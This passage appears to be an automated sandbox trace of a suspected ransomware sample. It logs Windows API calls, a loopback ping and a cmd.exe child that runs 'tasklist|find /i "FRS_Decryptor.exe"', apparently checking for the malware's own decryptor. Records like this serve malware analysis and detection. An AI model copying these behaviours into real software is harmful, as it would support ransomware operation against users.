_File=0x76ea4c28) returned 0 [0140.563] _fileno (_File=0x76ea4c28) returned 1 [0140.563] _get_osfhandle (_FileHandle=1) returned 0x28 [0140.563] GetFileType (hFile=0x28) returned 0x2 [0140.563] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x33f214 | out: lpMode=0x33f214) returned 0 [0140.563] GetLastError () returned 0x6 [0140.563] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x33f178, nSize=0x50 | out: lpBuffer="3✨") returned 0x0 [0140.563] _fileno (_File=0x76ea4c28) returned 1 [0140.563] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0140.563] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0140.563] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x5d8a90 [0140.563] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x5d8a90, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0140.563] _fileno (_File=0x76ea4c28) returned 1 [0140.563] _write (in: _FileHandle=1, _Buf=0x5d8a90*, _MaxCharCount=0x9 | out: _Buf=0x5d8a90*) returned 9 [0140.563] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0140.563] _fileno (_File=0x76ea4c28) returned 1 [0140.563] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0140.563] LocalFree (hMem=0x5d8a90) returned 0x0 [0140.563] LocalFree (hMem=0x5e7fa0) returned 0x0 [0140.563] GetNameInfoW (in: pSockaddr=0x945480*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), SockaddrLength=0x10, pNodeBuffer=0x33f1d8, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="127.0.0.1", pServiceBuffer=0x0) returned 0 [0140.563] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274f, dwLanguageId=0x0, lpBuffer=0x33f1ac, nSize=0x0, Arguments=0x33f1a8 | out: lpBuffer="羠^3᧰\x94䰨盪❏") returned 0x5c [0140.563] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0140.563] _fileno (_File=0x76ea4c28) returned 1 [0140.563] _get_osfhandle (_FileHandle=1) returned 0x28 [0140.563] GetFileType (hFile=0x28) returned 0x2 [0140.563] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x33f170 | out: lpMode=0x33f170) returned 0 [0140.563] GetLastError () returned 0x6 [0140.563] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x33f0d4, nSize=0x50 | out: lpBuffer="❏") returned 0x0 [0140.564] _fileno (_File=0x76ea4c28) returned 1 [0140.564] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0140.564] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 93 [0140.564] LocalAlloc (uFlags=0x40, uBytes=0x5d) returned 0x5e8068 [0140.564] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", cchWideChar=-1, lpMultiByteStr=0x5e8068, cbMultiByte=93, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", lpUsedDefaultChar=0x0) returned 93 [0140.564] _fileno (_File=0x76ea4c28) returned 1 [0140.564] _write (in: _FileHandle=1, _Buf=0x5e8068*, _MaxCharCount=0x5c | out: _Buf=0x5e8068*) returned 92 [0140.564] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0140.564] _fileno (_File=0x76ea4c28) returned 1 [0140.564] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0140.564] LocalFree (hMem=0x5e8068) returned 0x0 [0140.564] LocalFree (hMem=0x5e7fa0) returned 0x0 [0140.564] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2753, dwLanguageId=0x0, lpBuffer=0x33f1b8, nSize=0x0, Arguments=0x33f1b4 | out: lpBuffer="羠^3ᨧ\x94䰨盪❓") returned 0x61 [0140.564] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0140.564] _fileno (_File=0x76ea4c28) returned 1 [0140.564] _get_osfhandle (_FileHandle=1) returned 0x28 [0140.564] GetFileType (hFile=0x28) returned 0x2 [0140.564] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x33f17c | out: lpMode=0x33f17c) returned 0 [0140.564] GetLastError () returned 0x6 [0140.564] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x33f0e0, nSize=0x50 | out: lpBuffer="3❓") returned 0x0 [0140.564] _fileno (_File=0x76ea4c28) returned 1 [0140.564] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0140.564] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 98 [0140.564] LocalAlloc (uFlags=0x40, uBytes=0x62) returned 0x5e8070 [0140.564] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", cchWideChar=-1, lpMultiByteStr=0x5e8070, cbMultiByte=98, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", lpUsedDefaultChar=0x0) returned 98 [0140.564] _fileno (_File=0x76ea4c28) returned 1 [0140.564] _write (in: _FileHandle=1, _Buf=0x5e8070*, _MaxCharCount=0x61 | out: _Buf=0x5e8070*) returned 97 [0140.564] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0140.564] _fileno (_File=0x76ea4c28) returned 1 [0140.564] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0140.564] LocalFree (hMem=0x5e8070) returned 0x0 [0140.564] LocalFree (hMem=0x5e7fa0) returned 0x0 [0140.564] IcmpCloseHandle (IcmpHandle=0x5d6d40) returned 1 [0140.565] LocalFree (hMem=0x5dc250) returned 0x0 [0140.565] LocalFree (hMem=0x5e5270) returned 0x0 [0140.565] WSACleanup () returned 0 [0140.565] exit (_Code=0) Thread: id = 428 os_tid = 0x900 Thread: id = 429 os_tid = 0x910 Process: id = "155" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x6600b000" os_pid = "0x90c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "C:\\Windows\\system32\\cmd.exe /c tasklist|find /i \"FRS_Decryptor.exe\"" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7914 start_va = 0x490000 end_va = 0x4affff entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 7915 start_va = 0x4b0000 end_va = 0x4b1fff entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 7916 start_va = 0x4c0000 end_va = 0x4cefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 7917 start_va = 0x4d0000 end_va = 0x50ffff entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 7918 start_va = 0x510000 end_va = 0x60ffff entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 7919 start_va = 0x610000 end_va = 0x613fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7920 start_va = 0x620000 end_va = 0x620fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 7921 start_va = 0x630000 end_va = 0x631fff entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 7922 start_va = 0x1290000 end_va = 0x12defff entry_point = 0x1290000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 7923 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 7924 start_va = 0x7f1b0000 end_va = 0x7f1d2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f1b0000" filename = "" Region: id = 7925 start_va = 0x7f1d9000 end_va = 0x7f1dbfff entry_point = 0x0 region_type = private name = "private_0x000000007f1d9000" filename = "" Region: id = 7926 start_va = 0x7f1dc000 end_va = 0x7f1dcfff entry_point = 0x0 region_type = private name = "private_0x000000007f1dc000" filename = "" Region: id = 7927 start_va = 0x7f1dd000 end_va = 0x7f1ddfff entry_point = 0x0 region_type = private name = "private_0x000000007f1dd000" filename = "" Region: id = 7928 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7929 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 7930 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7931 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 7932 start_va = 0x710000 end_va = 0x71ffff entry_point = 0x0 region_type = private name = "private_0x0000000000710000" filename = "" Region: id = 7933 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 7934 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 7935 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 7936 start_va = 0x490000 end_va = 0x49ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 7937 start_va = 0x640000 end_va = 0x6bdfff entry_point = 0x640000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7938 start_va = 0x780000 end_va = 0x87ffff entry_point = 0x0 region_type = private name = "private_0x0000000000780000" filename = "" Region: id = 7939 start_va = 0x930000 end_va = 0x93ffff entry_point = 0x0 region_type = private name = "private_0x0000000000930000" filename = "" Region: id = 7940 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 7941 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 7942 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 7943 start_va = 0x7f0b0000 end_va = 0x7f1affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f0b0000" filename = "" Region: id = 7944 start_va = 0x4a0000 end_va = 0x4a3fff entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 7945 start_va = 0x940000 end_va = 0xc14fff entry_point = 0x940000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 7964 start_va = 0x4b0000 end_va = 0x4b3fff entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Thread: id = 430 os_tid = 0x8e0 [0140.592] GetModuleHandleA (lpModuleName=0x0) returned 0x1290000 [0140.592] __set_app_type (_Type=0x1) [0140.592] __p__fmode () returned 0x76ea1768 [0140.592] __p__commode () returned 0x76ea176c [0140.592] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x12a89b1) returned 0x0 [0140.592] __getmainargs (in: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0, _DoWildCard=0, _StartInfo=0x12b507c | out: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0) returned 0 [0140.592] GetCurrentThreadId () returned 0x8e0 [0140.592] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x8e0) returned 0x34 [0140.592] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0140.592] GetProcAddress (hModule=0x74f70000, lpProcName="SetThreadUILanguage") returned 0x74fb3daf [0140.592] SetThreadUILanguage (LangId=0x0) returned 0x409 [0140.594] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0140.594] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x60fa90 | out: phkResult=0x60fa90*=0x0) returned 0x2 [0140.594] VirtualQuery (in: lpAddress=0x60fa9f, lpBuffer=0x60fa38, dwLength=0x1c | out: lpBuffer=0x60fa38*(BaseAddress=0x60f000, AllocationBase=0x510000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.594] VirtualQuery (in: lpAddress=0x510000, lpBuffer=0x60fa38, dwLength=0x1c | out: lpBuffer=0x60fa38*(BaseAddress=0x510000, AllocationBase=0x510000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0140.594] VirtualQuery (in: lpAddress=0x511000, lpBuffer=0x60fa38, dwLength=0x1c | out: lpBuffer=0x60fa38*(BaseAddress=0x511000, AllocationBase=0x510000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0140.594] VirtualQuery (in: lpAddress=0x513000, lpBuffer=0x60fa38, dwLength=0x1c | out: lpBuffer=0x60fa38*(BaseAddress=0x513000, AllocationBase=0x510000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.594] VirtualQuery (in: lpAddress=0x610000, lpBuffer=0x60fa38, dwLength=0x1c | out: lpBuffer=0x60fa38*(BaseAddress=0x610000, AllocationBase=0x610000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0140.594] GetConsoleOutputCP () returned 0x1b5 [0140.594] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0140.594] SetConsoleCtrlHandler (HandlerRoutine=0x12b1877, Add=1) returned 1 [0140.594] _get_osfhandle (_FileHandle=1) returned 0x260 [0140.594] SetConsoleMode (hConsoleHandle=0x260, dwMode=0x0) returned 0 [0140.595] _get_osfhandle (_FileHandle=1) returned 0x260 [0140.595] GetConsoleMode (in: hConsoleHandle=0x260, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 0 [0140.595] _get_osfhandle (_FileHandle=0) returned 0x24 [0140.595] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0140.595] GetEnvironmentStringsW () returned 0x7840c0* [0140.595] FreeEnvironmentStringsA (penv="=") returned 1 [0140.595] GetEnvironmentStringsW () returned 0x7840c0* [0140.595] FreeEnvironmentStringsA (penv="=") returned 1 [0140.595] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x60e9e0 | out: phkResult=0x60e9e0*=0x44) returned 0x0 [0140.595] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x60e9e8, lpData=0x60e9ec, lpcbData=0x60e9e4*=0x1000 | out: lpType=0x60e9e8*=0x0, lpData=0x60e9ec*=0x0, lpcbData=0x60e9e4*=0x1000) returned 0x2 [0140.595] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x60e9e8, lpData=0x60e9ec, lpcbData=0x60e9e4*=0x1000 | out: lpType=0x60e9e8*=0x4, lpData=0x60e9ec*=0x1, lpcbData=0x60e9e4*=0x4) returned 0x0 [0140.595] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x60e9e8, lpData=0x60e9ec, lpcbData=0x60e9e4*=0x1000 | out: lpType=0x60e9e8*=0x0, lpData=0x60e9ec*=0x1, lpcbData=0x60e9e4*=0x1000) returned 0x2 [0140.595] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x60e9e8, lpData=0x60e9ec, lpcbData=0x60e9e4*=0x1000 | out: lpType=0x60e9e8*=0x4, lpData=0x60e9ec*=0x0, lpcbData=0x60e9e4*=0x4) returned 0x0 [0140.595] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x60e9e8, lpData=0x60e9ec, lpcbData=0x60e9e4*=0x1000 | out: lpType=0x60e9e8*=0x4, lpData=0x60e9ec*=0x40, lpcbData=0x60e9e4*=0x4) returned 0x0 [0140.595] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x60e9e8, lpData=0x60e9ec, lpcbData=0x60e9e4*=0x1000 | out: lpType=0x60e9e8*=0x4, lpData=0x60e9ec*=0x40, lpcbData=0x60e9e4*=0x4) returned 0x0 [0140.595] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x60e9e8, lpData=0x60e9ec, lpcbData=0x60e9e4*=0x1000 | out: lpType=0x60e9e8*=0x0, lpData=0x60e9ec*=0x40, lpcbData=0x60e9e4*=0x1000) returned 0x2 [0140.595] RegCloseKey (hKey=0x44) returned 0x0 [0140.595] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x60e9e0 | out: phkResult=0x60e9e0*=0x44) returned 0x0 [0140.596] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x60e9e8, lpData=0x60e9ec, lpcbData=0x60e9e4*=0x1000 | out: lpType=0x60e9e8*=0x0, lpData=0x60e9ec*=0x40, lpcbData=0x60e9e4*=0x1000) returned 0x2 [0140.596] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x60e9e8, lpData=0x60e9ec, lpcbData=0x60e9e4*=0x1000 | out: lpType=0x60e9e8*=0x4, lpData=0x60e9ec*=0x1, lpcbData=0x60e9e4*=0x4) returned 0x0 [0140.596] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x60e9e8, lpData=0x60e9ec, lpcbData=0x60e9e4*=0x1000 | out: lpType=0x60e9e8*=0x0, lpData=0x60e9ec*=0x1, lpcbData=0x60e9e4*=0x1000) returned 0x2 [0140.596] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x60e9e8, lpData=0x60e9ec, lpcbData=0x60e9e4*=0x1000 | out: lpType=0x60e9e8*=0x4, lpData=0x60e9ec*=0x0, lpcbData=0x60e9e4*=0x4) returned 0x0 [0140.596] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x60e9e8, lpData=0x60e9ec, lpcbData=0x60e9e4*=0x1000 | out: lpType=0x60e9e8*=0x4, lpData=0x60e9ec*=0x9, lpcbData=0x60e9e4*=0x4) returned 0x0 [0140.596] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x60e9e8, lpData=0x60e9ec, lpcbData=0x60e9e4*=0x1000 | out: lpType=0x60e9e8*=0x4, lpData=0x60e9ec*=0x9, lpcbData=0x60e9e4*=0x4) returned 0x0 [0140.596] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x60e9e8, lpData=0x60e9ec, lpcbData=0x60e9e4*=0x1000 | out: lpType=0x60e9e8*=0x0, lpData=0x60e9ec*=0x9, lpcbData=0x60e9e4*=0x1000) returned 0x2 [0140.596] RegCloseKey (hKey=0x44) returned 0x0 [0140.596] time (in: timer=0x0 | out: timer=0x0) returned 0x5aa500b7 [0140.596] srand (_Seed=0x5aa500b7) [0140.596] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tasklist|find /i \"FRS_Decryptor.exe\"" [0140.596] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tasklist|find /i \"FRS_Decryptor.exe\"" [0140.596] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0140.596] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x7840c8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0140.596] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0140.596] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0140.596] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0140.596] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.596] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0140.596] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0140.596] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0140.596] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0140.596] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0140.596] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0140.596] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0140.596] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0140.596] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0140.596] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x60f7c0 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0140.597] GetFullPathNameW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", nBufferLength=0x104, lpBuffer=0x60f7c0, lpFilePart=0x60f7bc | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x60f7bc*="Desktop") returned 0x1c [0140.597] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0140.597] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x60f538 | out: lpFindFileData=0x60f538) returned 0x7842d8 [0140.597] FindClose (in: hFindFile=0x7842d8 | out: hFindFile=0x7842d8) returned 1 [0140.597] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp", lpFindFileData=0x60f538 | out: lpFindFileData=0x60f538) returned 0x7842d8 [0140.597] FindClose (in: hFindFile=0x7842d8 | out: hFindFile=0x7842d8) returned 1 [0140.597] _wcsnicmp (_String1="5JGHKO~1", _String2="5JgHKoaOfdp", _MaxCount=0xb) returned 29 [0140.597] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFindFileData=0x60f538 | out: lpFindFileData=0x60f538) returned 0x7842d8 [0140.597] FindClose (in: hFindFile=0x7842d8 | out: hFindFile=0x7842d8) returned 1 [0140.597] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0140.597] SetCurrentDirectoryW (lpPathName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 1 [0140.597] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 1 [0140.597] GetEnvironmentStringsW () returned 0x786190* [0140.597] FreeEnvironmentStringsA (penv="=") returned 1 [0140.597] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0140.598] GetConsoleOutputCP () returned 0x1b5 [0140.598] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0140.598] GetUserDefaultLCID () returned 0x409 [0140.598] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12b5560, cchData=8 | out: lpLCData=":") returned 2 [0140.598] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x60f8ec, cchData=128 | out: lpLCData="0") returned 2 [0140.598] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x60f8ec, cchData=128 | out: lpLCData="0") returned 2 [0140.598] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x60f8ec, cchData=128 | out: lpLCData="1") returned 2 [0140.598] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12b5570, cchData=8 | out: lpLCData="/") returned 2 [0140.598] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12b5660, cchData=32 | out: lpLCData="Mon") returned 4 [0140.598] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12b56a0, cchData=32 | out: lpLCData="Tue") returned 4 [0140.598] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12b56e0, cchData=32 | out: lpLCData="Wed") returned 4 [0140.599] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12b5720, cchData=32 | out: lpLCData="Thu") returned 4 [0140.599] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12b5760, cchData=32 | out: lpLCData="Fri") returned 4 [0140.599] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12b57a0, cchData=32 | out: lpLCData="Sat") returned 4 [0140.599] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12b57e0, cchData=32 | out: lpLCData="Sun") returned 4 [0140.599] GetLocaleInfoW (in: Locale=0x409, 